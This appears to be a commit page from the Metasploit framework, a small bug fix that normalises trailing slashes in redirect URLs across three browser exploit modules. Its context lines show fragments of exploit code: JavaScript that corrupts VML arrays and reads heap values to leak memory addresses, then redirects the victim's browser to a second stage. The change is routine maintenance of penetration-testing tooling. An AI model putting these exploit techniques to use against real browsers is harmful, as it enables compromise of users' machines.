Land #2538 - Fix redirect URLs

bug/bundler_fix
sinn3r 2013-10-21 11:08:03 -05:00
commit 36dace26fa
No known key found for this signature in database
GPG Key ID: 2384DB4EF06F730B
3 changed files with 4 additions and 4 deletions

View File

@ -104,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote
}
window.onload = function() {
document.location = "#{get_resource}/#{@exploit_page}?dll=" + getDLL();
document.location = "#{get_resource.chomp("/")}/#{@exploit_page}?dll=" + getDLL();
}
</script>
</html>

View File

@ -275,7 +275,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def send_stage(cli, my_target, stage='trigger', leak=0)
midi_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
midi_uri = get_resource.chomp("/")
if stage == 'leak'
midi_uri << "/#{@ml_name}"
@ -496,7 +496,7 @@ class Metasploit3 < Msf::Exploit::Remote
while (k > 0) {
if (typeof(clones[k].w1) == "string") {
var leak = clones[k].w1.charCodeAt(1)*0x10000 + clones[k].w1.charCodeAt(0)
document.location = "#{get_resource}/#{@second_stage_url}" + "?#{@leak_param}=" + leak
document.location = "#{get_resource.chomp("/")}/#{@second_stage_url}" + "?#{@leak_param}=" + leak
return;
}
k = k - 2;

View File

@ -341,7 +341,7 @@ function exploit(){
var leak = a[i].marginLeft;
vml1.dashstyle.array.item(0x2E+0x16) = marginLeftAddress;
vml1.dashstyle.array.length = length_orig;
document.location = "#{get_resource}/#{@second_stage_url}" + "?#{@leak_param}=" + parseInt( leak.charCodeAt(1).toString(16) + leak.charCodeAt(0).toString(16), 16 )
document.location = "#{get_resource.chomp("/")}/#{@second_stage_url}" + "?#{@leak_param}=" + parseInt( leak.charCodeAt(1).toString(16) + leak.charCodeAt(0).toString(16), 16 )
return;
}
}